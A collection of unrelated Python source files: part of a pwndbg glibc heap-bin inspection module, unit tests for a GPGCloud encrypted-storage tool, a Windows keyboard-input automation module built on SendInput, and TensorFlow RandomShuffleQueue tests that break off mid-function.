+ [ pow(2, 12) ] * 8 \
+ [ pow(2, 15) ] * 4 \
+ [ pow(2, 18) ] * 2 \
+ [ pow(2, 21) ] * 1
# There is no index 0
spaces_table = [ None ] + spaces_table
# Fix up the slop in bin spacing (part of libc - they made
# the trade off of some slop for speed)
# https://bazaar.launchpad.net/~ubuntu-branches/ubuntu/trusty/eglibc/trusty-security/view/head:/malloc/malloc.c#L1356
if pwndbg.arch.ptrsize == 8:
spaces_table[97] = 64
spaces_table[98] = 448
spaces_table[113] = 1536
spaces_table[121] = 24576
spaces_table[125] = 98304
return spaces_table
def chunk_flags(self, size):
return ( size & ptmalloc.PREV_INUSE ,
size & ptmalloc.IS_MMAPPED,
size & ptmalloc.NON_MAIN_ARENA )
def chunk_key_offset(self, key):
"""
Finds the index of a field in the malloc_chunk struct.
64 bit example.)
prev_size == 0
size == 8
fd == 16
bk == 24
...
"""
chunk_keys = self.malloc_chunk.keys()
try:
return chunk_keys.index(key) * pwndbg.arch.ptrsize
except:
return None
def get_arena(self, arena_addr=None):
if arena_addr is None:
return self.main_arena
return pwndbg.memory.poi(self.malloc_state, arena_addr)
def get_bounds(self):
"""
Finds the heap bounds by using mp_ structure's sbrk_base property
and falls back to using /proc/self/maps (vmmap) which can be wrong
when .bss is very large
"""
lower, upper = None, None
try:
lower = int(self.mp['sbrk_base'])
except:
lower = None
page = None
for m in pwndbg.vmmap.get():
if m.objfile == '[heap]':
page = m
break
if page is not None:
lower = lower or page.vaddr
return (lower, page.vaddr + page.memsz)
return (None, None)
def fastbin_index(self, size):
if pwndbg.arch.ptrsize == 8:
return (size >> 4) - 2
else:
return (size >> 3) - 2
def fastbins(self, arena_addr=None):
arena = self.get_arena(arena_addr)
if arena is None:
return
fastbinsY = arena['fastbinsY']
fd_offset = self.chunk_key_offset('fd')
num_fastbins = 7
size = pwndbg.arch.ptrsize * 2
result = OrderedDict()
for i in range(num_fastbins):
size += pwndbg.arch.ptrsize * 2
chain = pwndbg.chain.get(int(fastbinsY[i]), offset=fd_offset)
result[size] = chain
return result
def bin_at(self, index, arena_addr=None):
"""
Modeled after glibc's bin_at function - so starts indexing from 1
https://bazaar.launchpad.net/~ubuntu-branches/ubuntu/trusty/eglibc/trusty-security/view/head:/malloc/malloc.c#L1394
bin_at(1) returns the unsorted bin
Bin 1 - Unsorted BiN
Bin 2 to 63 - Smallbins
Bin 64 to 126 - Largebins
"""
index = index - 1
arena = self.get_arena(arena_addr)
if arena is None:
return
normal_bins = arena['bins']
num_bins = normal_bins.type.sizeof // normal_bins.type.target().sizeof
bins_base = int(normal_bins.address) - (pwndbg.arch.ptrsize* 2)
current_base = bins_base + (index * pwndbg.arch.ptrsize * 2)
front, back = normal_bins[index * 2], normal_bins[index * 2 + 1]
fd_offset = self.chunk_key_offset('fd')
chain = pwndbg.chain.get(int(front), offset=fd_offset, hard_stop=current_base)
return chain
def unsortedbin(self, arena_addr=None):
chain = self.bin_at(1, arena_addr=arena_addr)
result = OrderedDict()
if chain is None:
return
result['all'] = chain
return result
def smallbins(self, arena_addr=None):
size = self.min_chunk_size - self.malloc_alignment
spaces_table = self._spaces_table()
result = OrderedDict()
for index in range(2, 64):
size += spaces_table[index]
chain = self.bin_at(index, arena_addr=arena_addr)
if chain is None:
return
result[size] = chain
return result
def largebins(self, arena_addr=None):
size = (ptmalloc.NSMALLBINS * self.malloc_alignment) - self.malloc_alignment
spaces_table = self._spaces_table()
result = OrderedDict()
for index in range(64, 127):
size += spaces_table[index]
chain = self.bin_at(index, arena_addr=arena_addr)
if chain is None:
return
result[size] = chain
return result
| |
"""
Unit tests for `GPGCloud` project.
"""
import os
import tempfile
import unittest
from cloud import Cloud, amazon, sftp
from config import Config, ConfigError
from database import MetaDataDB
from lib import random_string, checksum_file, checksum_data
class TestUtils(unittest.TestCase):
"""
Test cases for utility functions.
"""
def setUp(self):
pass
def test_utils_random_string(self):
"""
Test random string creation.
"""
for length in range(10, 100, 10):
random_1 = random_string(length)
random_2 = random_string(length)
self.assertEqual(len(random_1), length)
self.assertEqual(len(random_2), length)
self.assertNotEqual(random_1, random_2)
def test_utils_checksum(self):
"""
Test checksum functions.
"""
checksum = "ba5d39304c72c92f73203798033eb52b" \
"e1830da828d4c82ee7023b74b81949d8"
data = file("LICENSE").read()
self.assertEqual(checksum_data(data), checksum)
self.assertEqual(checksum_file("LICENSE"), checksum)
class TestConfig(unittest.TestCase):
"""
Test cases for configuration handling.
"""
def setUp(self):
pass
def test_config_no_file(self):
"""
Test configuration handling without config file.
"""
if os.path.isfile("test_config.conf"):
os.remove("test_config.conf")
self.assertRaises(ConfigError, Config, "test_config.conf")
def test_config_ok_config(self):
"""
Test configuration handling with config file.
"""
test_data = ("[gnupg]\n"
"recipients = tkl@iki.fi\n"
"signer = tommi.linnakangas@iki.fi\n"
"\n"
"[amazon-s3]\n"
"access_key = ACCESSKEY\n"
"secret_access_key = SECRETACCESSKEY\n"
"\n"
"[data]\n"
"\n"
"bucket = DATABUCKET\n"
"[metadata]\n"
"bucket = METADATABUCKET\n"
"\n")
if os.path.isfile("test_config.conf"):
os.remove("test_config.conf")
file("test_config.conf", "wb").write(test_data)
config = Config("test_config.conf")
self.assertIn("gnupg", config.config.sections())
self.assertIn("amazon-s3", config.config.sections())
self.assertEqual(config.config.get(
"gnupg", "recipients"), "tkl@iki.fi")
self.assertEqual(config.config.get(
"gnupg", "signer"), "tommi.linnakangas@iki.fi")
self.assertEqual(config.config.get(
"amazon-s3", "access_key"), "ACCESSKEY")
self.assertEqual(config.config.get(
"amazon-s3", "secret_access_key"), "SECRETACCESSKEY")
self.assertEqual(config.config.get(
"data", "bucket"), "DATABUCKET")
self.assertEqual(config.config.get(
"metadata", "bucket"), "METADATABUCKET")
os.remove("test_config.conf")
def test_config_wrong_config(self):
"""
Test configuration handling with config file with wrong config.
"""
test_data_1 = ("[gnupg_missing]\n"
"recipients = tkl@iki.fi\n"
"signer = tkl@iki.fi\n"
"[amazon-s3]\n"
"access_key = ACCESSKEY\n"
"secret_access_key = SECRETACCESSKEY\n"
"[data]\n"
"bucket = DATABUCKET\n"
"[metadata]\n"
"bucket = METADATABUCKET\n")
test_data_2 = ("[gnupg]\n"
"recipients_missing = tkl@iki.fi\n"
"signer = tkl@iki.fi\n"
"[amazon-s3]\n"
"access_key = ACCESSKEY\n"
"secret_access_key = SECRETACCESSKEY\n"
"[data]\n"
"bucket = DATABUCKET\n"
"[metadata]\n"
"bucket = METADATABUCKET\n")
if os.path.isfile("test_config.conf"):
os.remove("test_config.conf")
file("test_config.conf", "wb").write(test_data_1)
config = Config("test_config.conf")
self.assertRaises(
ConfigError, config.check, "gnupg", ["recipients", "signer"])
file("test_config.conf", "wb").write(test_data_2)
config = Config("test_config.conf")
self.assertRaises(
ConfigError, config.check, "gnupg", ["recipients", "signer"])
os.remove("test_config.conf")
class TestAmazonS3(unittest.TestCase):
"""
Test cases for Amazon S3 access.
"""
def setUp(self):
pass
def test_amazon_s3_store_data(self):
"""
Test storing data to Amazons S3, both to metadata and data buckets.
"""
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = amazon.S3(config, metadata_bucket).connect()
provider = amazon.S3(config, data_bucket).connect()
datas = dict()
metadatas = dict()
for data, metadata in (("Data 1", "Metadata 1"),
("Data 2", "Metadata 2")):
key = checksum_data(data)
metadata_provider.store(key, metadata)
provider.store(key, data)
new_metadata = metadata_provider.retrieve(key)
new_data = provider.retrieve(key)
self.assertEqual(new_data, data)
self.assertEqual(new_metadata, metadata)
datas[key] = data
metadatas[key] = metadata
for key, metadata in metadata_provider.list().items():
self.assertEqual(metadata, metadatas[key])
for key, data in provider.list().items():
self.assertEqual(data, datas[key])
for key, metadata in metadatas.items():
metadata_provider.delete(key)
for key, data in datas.items():
provider.delete(key)
metadata_provider.disconnect()
provider.disconnect()
def test_amazon_s3_store_filename(self):
"""
Test storing files to Amazons S3, both to metadata and data buckets.
"""
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = amazon.S3(config, metadata_bucket).connect()
provider = amazon.S3(config, data_bucket).connect()
key = checksum_file("LICENSE")
metadata_provider.store(key, "LICENSE METADATA")
provider.store_from_filename(key, "LICENSE")
t = tempfile.NamedTemporaryFile()
metadata = metadata_provider.retrieve(key)
provider.retrieve_to_filename(key, t.name)
self.assertEqual(file("LICENSE").read(), file(t.name).read())
self.assertEqual("LICENSE METADATA", metadata)
metadata_provider.delete(key)
provider.delete(key)
metadata_provider.disconnect()
provider.disconnect()
def test_amazon_s3_delete_all_keys(self):
"""
Test deleting all Amazons S3 keys, both from metadata and
data buckets.
"""
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = amazon.S3(config, metadata_bucket).connect()
provider = amazon.S3(config, data_bucket).connect()
for key, metadata in metadata_provider.list().items():
metadata_provider.delete(key)
for key, data in provider.list().items():
provider.delete(key)
metadata_provider.disconnect()
provider.disconnect()
class TestSftp(unittest.TestCase):
"""
Test cases for SFTP filesystem.
"""
def setUp(self):
pass
def test_sftp_store_data(self):
"""
Test storing data to filesystem, both to metadata and data buckets.
"""
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
provider = sftp.Sftp(config, data_bucket).connect()
datas = dict()
metadatas = dict()
for data, metadata in (("Data 1", "Metadata 1"),
("Data 2", "Metadata 2")):
key = checksum_data(data)
metadata_provider.store(key, metadata)
provider.store(key, data)
new_metadata = metadata_provider.retrieve(key)
new_data = provider.retrieve(key)
self.assertEqual(new_data, data)
self.assertEqual(new_metadata, metadata)
datas[key] = data
metadatas[key] = metadata
for key, metadata in metadata_provider.list().items():
self.assertEqual(metadata, metadatas[key])
for key, data in provider.list().items():
self.assertEqual(data, datas[key])
for key, metadata in metadatas.items():
metadata_provider.delete(key)
for key, data in datas.items():
provider.delete(key)
metadata_provider.disconnect()
provider.disconnect()
def test_sftp_store_filename(self):
"""
Test storing files to SFTP filesystem, both to metadata and data
buckets.
"""
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
provider = sftp.Sftp(config, data_bucket).connect()
key = checksum_file("LICENSE")
metadata_provider.store(key, "LICENSE METADATA")
provider.store_from_filename(key, "LICENSE")
t = tempfile.NamedTemporaryFile()
metadata = metadata_provider.retrieve(key)
provider.retrieve_to_filename(key, t.name)
self.assertEqual(file("LICENSE").read(), file(t.name).read())
self.assertEqual("LICENSE METADATA", metadata)
metadata_provider.delete(key)
provider.delete(key)
metadata_provider.disconnect()
provider.disconnect()
def test_sftp_delete_all_keys(self):
"""
Test deleting all filesystem keys, both from metadata and
data buckets.
"""
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
provider = sftp.Sftp(config, data_bucket).connect()
for key, metadata in metadata_provider.list().items():
metadata_provider.delete(key)
for key, data in provider.list().items():
provider.delete(key)
metadata_provider.disconnect()
provider.disconnect()
class TestCloud(unittest.TestCase):
"""
Test cases for cloud access, data is encrypted and decrypted.
"""
def setUp(self):
pass
def _test_cloud_store_data(self, config, metadata_provider, provider):
"""
Store encrypted data to cloud.
"""
database = MetaDataDB(config)
database.drop()
cloud = Cloud(config, metadata_provider, provider, database).connect()
data1 = file("testdata/data1.txt").read()
data2 = file("testdata/data2.txt").read()
data3 = file("testdata/data2.txt").read()
data4 = file("testdata/data2.txt").read()
metadata1 = cloud.store(data1, "testdata/data1.txt")
metadata2 = cloud.store(data2, "testdata/data2.txt")
metadata3 = cloud.store(data3, "testdata/data3.txt")
metadata4 = cloud.store(data4, "testdata/data4.txt")
for metadata in cloud.list():
if metadata["key"] == metadata1["key"]:
self.assertEqual("testdata/data1.txt", metadata["path"])
if metadata["key"] == metadata2["key"]:
self.assertEqual("testdata/data2.txt", metadata["path"])
if metadata["key"] == metadata3["key"]:
self.assertEqual("testdata/data3.txt", metadata["path"])
if metadata["key"] == metadata4["key"]:
self.assertEqual("testdata/data4.txt", metadata["path"])
new_data1 = cloud.retrieve(metadata1)
new_data2 = cloud.retrieve(metadata2)
new_data3 = cloud.retrieve(metadata3)
new_data4 = cloud.retrieve(metadata4)
self.assertEqual(data1, new_data1)
self.assertEqual("testdata/data1.txt", metadata1["path"])
self.assertEqual(data2, new_data2)
self.assertEqual("testdata/data2.txt", metadata2["path"])
self.assertEqual(data2, new_data3)
self.assertEqual("testdata/data3.txt", metadata3["path"])
self.assertEqual(data2, new_data4)
self.assertEqual("testdata/data4.txt", metadata4["path"])
cloud.delete(metadata1)
cloud.delete(metadata2)
cloud.delete(metadata3)
cloud.delete(metadata4)
cloud.disconnect()
def _test_cloud_amazon_s3_store_data(self, encryption_method):
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = amazon.S3(config, metadata_bucket).connect()
provider = amazon.S3(config, data_bucket, encryption_method).connect()
self._test_cloud_store_data(config, metadata_provider, provider)
def _test_cloud_sftp_store_data(self, encryption_method):
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
provider = sftp.Sftp(config, data_bucket, encryption_method).connect()
self._test_cloud_store_data(config, metadata_provider, provider)
def _test_cloud_store_filename(self, config, metadata_provider, provider):
"""
Store file as encrypted data to cloud.
"""
database = MetaDataDB(config)
database.drop()
cloud = Cloud(config, metadata_provider, provider, database).connect()
data1 = file("testdata/data1.txt").read()
data2 = file("testdata/data2.txt").read()
metadata1 = cloud.store_from_filename(
"testdata/data1.txt", "testdata/data1.txt")
metadata2 = cloud.store_from_filename(
"testdata/data2.txt", "testdata/data2.txt")
metadata3 = cloud.store_from_filename(
"testdata/data2.txt", "testdata/data3.txt")
metadata4 = cloud.store_from_filename(
"testdata/data2.txt", "testdata/data4.txt")
for metadata in cloud.list():
if metadata["key"] == metadata1["key"]:
self.assertEqual("testdata/data1.txt", metadata["path"])
if metadata["key"] == metadata2["key"]:
self.assertEqual("testdata/data2.txt", metadata["path"])
if metadata["key"] == metadata3["key"]:
self.assertEqual("testdata/data3.txt", metadata["path"])
if metadata["key"] == metadata4["key"]:
self.assertEqual("testdata/data4.txt", metadata["path"])
cloud.retrieve_to_filename(
metadata1, "testdata/new_data1.txt")
cloud.retrieve_to_filename(
metadata2, "testdata/new_data2.txt")
cloud.retrieve_to_filename(
metadata3, "testdata/new_data3.txt")
cloud.retrieve_to_filename(
metadata4, "testdata/new_data4.txt")
self.assertEqual(data1, file("testdata/new_data1.txt").read())
self.assertEqual("testdata/data1.txt", metadata1["path"])
self.assertEqual(data2, file("testdata/new_data2.txt").read())
self.assertEqual("testdata/data2.txt", metadata2["path"])
self.assertEqual(data2, file("testdata/new_data3.txt").read())
self.assertEqual("testdata/data3.txt", metadata3["path"])
self.assertEqual(data2, file("testdata/new_data4.txt").read())
self.assertEqual("testdata/data4.txt", metadata4["path"])
cloud.delete(metadata1)
cloud.delete(metadata2)
cloud.delete(metadata3)
cloud.delete(metadata4)
cloud.disconnect()
os.remove("testdata/new_data1.txt")
os.remove("testdata/new_data2.txt")
os.remove("testdata/new_data3.txt")
os.remove("testdata/new_data4.txt")
def _test_cloud_amazon_s3_store_filename(self, encryption_method):
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = amazon.S3(config, metadata_bucket).connect()
provider = amazon.S3(config, data_bucket, encryption_method).connect()
self._test_cloud_store_filename(config, metadata_provider, provider)
def _test_cloud_sftp_store_filename(self, encryption_method):
config = Config()
metadata_bucket = config.config.get("metadata", "bucket")
data_bucket = config.config.get("data", "bucket")
metadata_provider = sftp.Sftp(config, metadata_bucket).connect()
provider = sftp.Sftp(config, data_bucket, encryption_method).connect()
self._test_cloud_store_filename(config, metadata_provider, provider)
class TestCloudGpgEncryption(TestCloud):
def test_cloud_amazon_s3_store_data(self):
self._test_cloud_amazon_s3_store_data(encryption_method="gpg")
def test_cloud_sftp_store_data(self):
self._test_cloud_sftp_store_data(encryption_method="gpg")
def test_cloud_amazon_s3_store_filename(self):
self._test_cloud_amazon_s3_store_filename(encryption_method="gpg")
def test_cloud_sftp_store_filename(self):
self._test_cloud_sftp_store_filename(encryption_method="gpg")
class TestCloudSymmetricEncryption(TestCloud):
def test_cloud_amazon_s3_store_data(self):
self._test_cloud_amazon_s3_store_data(encryption_method="symmetric")
def test_cloud_sftp_store_data(self):
self._test_cloud_sftp_store_data(encryption_method="symmetric")
def test_cloud_amazon_s3_store_filename(self):
self._test_cloud_amazon_s3_store_filename(
encryption_method="symmetric")
def test_cloud_sftp_store_filename(self):
self._test_cloud_sftp_store_filename(encryption_method="symmetric")
class TestCloudCryptoEngineEncryption(TestCloud):
def test_cloud_amazon_s3_store_data(self):
self._test_cloud_amazon_s3_store_data(encryption_method="cryptoengine")
def test_cloud_sftp_store_data(self):
self._test_cloud_sftp_store_data(encryption_method="cryptoengine")
def test_cloud_amazon_s3_store_filename(self):
self._test_cloud_amazon_s3_store_filename(
encryption_method="cryptoengine")
def test_cloud_sftp_store_filename(self):
self._test_cloud_sftp_store_filename(encryption_method="cryptoengine")
if __name__ == "__main__":
unittest.main()
| |
#!/usr/bin/env python
# Copyright (c) 2014-2017 Max Beloborodko.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__author__ = 'f1ashhimself@gmail.com'
import ctypes
from time import sleep
from ..interfaces.i_keyboard import Key, IKeyboard
send_input = ctypes.windll.user32.SendInput
pointer_unsigned_long = ctypes.POINTER(ctypes.c_ulong)
class KeyboardInput(ctypes.Structure):
"""
Keyboard input C struct definition.
"""
_fields_ = [("wVk", ctypes.c_ushort),
("wScan", ctypes.c_ushort),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", pointer_unsigned_long)]
class HardwareInput(ctypes.Structure):
"""
Hardware input C struct definition.
"""
_fields_ = [("uMsg", ctypes.c_ulong),
("wParamL", ctypes.c_short),
("wParamH", ctypes.c_ushort)]
class MouseInput(ctypes.Structure):
"""
Hardware input C struct definition.
"""
_fields_ = [("dx", ctypes.c_long),
("dy", ctypes.c_long),
("mouseData", ctypes.c_ulong),
("dwFlags", ctypes.c_ulong),
("time", ctypes.c_ulong),
("dwExtraInfo", pointer_unsigned_long)]
class EventStorage(ctypes.Union):
"""
Event storage C struct definition.
"""
_fields_ = [("ki", KeyboardInput),
("mi", MouseInput),
("hi", HardwareInput)]
class Input(ctypes.Structure):
"""
Input C struct definition.
"""
_fields_ = [("type", ctypes.c_ulong),
("ii", EventStorage)]
class WinKeyboard(IKeyboard):
class _KeyCodes(object):
"""
Holder for Windows keyboard codes stored as Keys.
"""
BACKSPACE = Key(0x08) # BACKSPACE key
TAB = Key(0x09) # TAB key
CLEAR = Key(0x0C) # CLEAR key
RETURN = Key(0x0D) # ENTER key
SHIFT = Key(0x10) # SHIFT key
CONTROL = Key(0x11) # CTRL key
ALT = Key(0x12) # ALT key
PAUSE = Key(0x13) # PAUSE key
CAPS_LOCK = Key(0x14) # CAPS LOCK key
ESCAPE = Key(0x1B) # ESC key
SPACE = Key(0x20) # SPACEBAR
PAGE_UP = Key(0x21) # PAGE UP key
PAGE_DOWN = Key(0x22) # PAGE DOWN key
END = Key(0x23) # END key
HOME = Key(0x24) # HOME key
LEFT = Key(0x25) # LEFT ARROW key
UP = Key(0x26) # UP ARROW key
RIGHT = Key(0x27) # RIGHT ARROW key
DOWN = Key(0x28) # DOWN ARROW key
PRINT_SCREEN = Key(0x2C) # PRINT SCREEN key
INSERT = Key(0x2D) # INS key
DELETE = Key(0x2E) # DEL key
VK_HELP = Key(0x2F) # HELP key
KEY_0 = Key(0x30) # 0 key
KEY_1 = Key(0x31) # 1 key
KEY_2 = Key(0x32) # 2 key
KEY_3 = Key(0x33) # 3 key
KEY_4 = Key(0x34) # 4 key
KEY_5 = Key(0x35) # 5 key
KEY_6 = Key(0x36) # 6 key
KEY_7 = Key(0x37) # 7 key
KEY_8 = Key(0x38) # 8 key
KEY_9 = Key(0x39) # 9 key
KEY_A = Key(0x41) # A key
KEY_B = Key(0x42) # B key
KEY_C = Key(0x43) # C key
KEY_D = Key(0x44) # D key
KEY_E = Key(0x45) # E key
KEY_F = Key(0x46) # F key
KEY_G = Key(0x47) # G key
KEY_H = Key(0x48) # H key
KEY_I = Key(0x49) # I key
KEY_J = Key(0x4A) # J key
KEY_K = Key(0x4B) # K key
KEY_L = Key(0x4C) # L key
KEY_M = Key(0x4D) # M key
KEY_N = Key(0x4E) # N key
KEY_O = Key(0x4F) # O key
KEY_P = Key(0x50) # P key
KEY_Q = Key(0x51) # Q key
KEY_R = Key(0x52) # R key
KEY_S = Key(0x53) # S key
KEY_T = Key(0x54) # T key
KEY_U = Key(0x55) # U key
KEY_V = Key(0x56) # V key
KEY_W = Key(0x57) # W key
KEY_X = Key(0x58) # X key
KEY_Y = Key(0x59) # Y key
KEY_Z = Key(0x5A) # Z key
LEFT_WIN = Key(0x5B) # Left Windows key (Natural keyboard)
RIGHT_WIN = Key(0x5C) # Right Windows key (Natural keyboard)
SLEEP = Key(0x5F) # Computer Sleep key
NUMPAD0 = Key(0x60) # Numeric keypad 0 key
NUMPAD1 = Key(0x61) # Numeric keypad 1 key
NUMPAD2 = Key(0x62) # Numeric keypad 2 key
NUMPAD3 = Key(0x63) # Numeric keypad 3 key
NUMPAD4 = Key(0x64) # Numeric keypad 4 key
NUMPAD5 = Key(0x65) # Numeric keypad 5 key
NUMPAD6 = Key(0x66) # Numeric keypad 6 key
NUMPAD7 = Key(0x67) # Numeric keypad 7 key
NUMPAD8 = Key(0x68) # Numeric keypad 8 key
NUMPAD9 = Key(0x69) # Numeric keypad 9 key
MULTIPLY = Key(0x6A) # Multiply key
ADD = Key(0x6B) # Add key
SEPARATOR = Key(0x6C) # Separator key
SUBTRACT = Key(0x6D) # Subtract key
DECIMAL = Key(0x6E) # Decimal key
DIVIDE = Key(0x6F) # Divide key
F1 = Key(0x70) # F1 key
F2 = Key(0x71) # F2 key
F3 = Key(0x72) # F3 key
F4 = Key(0x73) # F4 key
F5 = Key(0x74) # F5 key
F6 = Key(0x75) # F6 key
F7 = Key(0x76) # F7 key
F8 = Key(0x77) # F8 key
F9 = Key(0x78) # F9 key
F10 = Key(0x79) # F10 key
F11 = Key(0x7A) # F11 key
F12 = Key(0x7B) # F12 key
NUM_LOCK = Key(0x90) # NUM LOCK key
SCROLL_LOCK = Key(0x91) # SCROLL LOCK
LEFT_SHIFT = Key(0xA0) # Left SHIFT key
RIGHT_SHIFT = Key(0xA1) # Right SHIFT key
LEFT_CONTROL = Key(0xA2) # Left CONTROL key
RIGHT_CONTROL = Key(0xA3) # Right CONTROL key
OEM_1 = Key(0xBA) # For the US standard keyboard, the ';:' key
OEM_PLUS = Key(0xBB) # For any country/region, the '+' key
OEM_COMMA = Key(0xBC) # For any country/region, the ',' key
OEM_MINUS = Key(0xBD) # For any country/region, the '-' key
OEM_PERIOD = Key(0xBE) # For any country/region, the '.' key
OEM_2 = Key(0xBF) # For the US standard keyboard, the '/?' key
OEM_3 = Key(0xC0) # For the US standard keyboard, the '`~' key
OEM_4 = Key(0xDB) # For the US standard keyboard, the '[{' key
OEM_5 = Key(0xDC) # For the US standard keyboard, the '\|' key
OEM_6 = Key(0xDD) # For the US standard keyboard, the ']}' key
OEM_7 = Key(0xDE) # For the US standard keyboard, the ''/"' key
codes = _KeyCodes
def press_key(self, hex_key_code):
"""
Presses (and releases) key specified by a hex code.
:param int hex_key_code: hexadecimal code for a key to be pressed.
"""
self.press_key_and_hold(hex_key_code)
self.release_key(hex_key_code)
def press_key_and_hold(self, hex_key_code):
"""
Presses (and holds) key specified by a hex code.
:param int hex_key_code: hexadecimal code for a key to be pressed.
"""
extra = ctypes.c_ulong(0)
ii_ = EventStorage()
ii_.ki = KeyboardInput(hex_key_code, 0x48, 0, 0, ctypes.pointer(extra))
x = Input(ctypes.c_ulong(1), ii_)
send_input(1, ctypes.pointer(x), ctypes.sizeof(x))
def release_key(self, hex_key_code):
"""
Releases key specified by a hex code.
:param int hex_key_code: hexadecimal code for a key to be pressed.
"""
extra = ctypes.c_ulong(0)
ii_ = EventStorage()
ii_.ki = KeyboardInput(
hex_key_code, 0x48, 0x0002, 0, ctypes.pointer(extra))
x = Input(ctypes.c_ulong(1), ii_)
send_input(1, ctypes.pointer(x), ctypes.sizeof(x))
def send(self, *args, **kwargs):
"""
Send key events as specified by Keys.
If Key contains children Keys they will be recursively
processed with current Key code pressed as a modifier key.
:param args: keys to send.
"""
delay = kwargs.get('delay', 0)
for key in args:
if key.children:
self.press_key_and_hold(key.code)
self.send(*key.children)
self.release_key(key.code)
else:
self.press_key(key.code)
self._wait_for_key_combo_to_be_processed()
sleep(delay)
def _wait_for_key_combo_to_be_processed(self):
# For key combinations timeout is needed to be processed.
# This method is expressive shortcut to be used where needed.
sleep(.05)
| |
"""Tests for tensorflow.ops.data_flow_ops.Queue."""
import random
import re
import time
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class RandomShuffleQueueTest(tf.test.TestCase):
def setUp(self):
# Useful for debugging when a test times out.
super(RandomShuffleQueueTest, self).setUp()
tf.logging.error("Starting: %s", self._testMethodName)
def tearDown(self):
super(RandomShuffleQueueTest, self).tearDown()
tf.logging.error("Finished: %s", self._testMethodName)
def testEnqueue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 5, tf.float32)
enqueue_op = q.enqueue((10.0,))
self.assertAllEqual(0, q.size().eval())
enqueue_op.run()
self.assertAllEqual(1, q.size().eval())
def testEnqueueWithShape(self):
with self.test_session():
q = tf.RandomShuffleQueue(
10, 5, tf.float32, shapes=tf.TensorShape([3, 2]))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
self.assertAllEqual(1, q.size().eval())
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
def testEnqueueManyWithShape(self):
with self.test_session():
q = tf.RandomShuffleQueue(
10, 5, [tf.int32, tf.int32],
shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertAllEqual(4, q.size().eval())
q2 = tf.RandomShuffleQueue(10, 5, tf.int32, shapes=tf.TensorShape([3]))
q2.enqueue(([1, 2, 3],))
q2.enqueue_many(([[1, 2, 3]],))
def testScalarShapes(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(
10, 0, [tf.int32, tf.int32],
shapes=[(), (1,)])
q.enqueue_many([[1, 2, 3, 4], [[5], [6], [7], [8]]]).run()
q.enqueue([9, [10]]).run()
dequeue_t = q.dequeue()
results = []
for _ in range(2):
a, b = sess.run(dequeue_t)
results.append((a, b))
a, b = sess.run(q.dequeue_many(3))
for i in range(3):
results.append((a[i], b[i]))
self.assertItemsEqual([(1, [5]), (2, [6]), (3, [7]), (4, [8]), (9, [10])],
results)
def testParallelEnqueue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 0, tf.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue, args=(e,))
for e in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(10, 0, tf.float32)
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = tf.RandomShuffleQueue(10, 0, tf.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
vals = [dequeued_t.eval() for _ in xrange(len(elems))]
self.assertItemsEqual(elems, vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = tf.RandomShuffleQueue(3, 0, tf.float32)
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
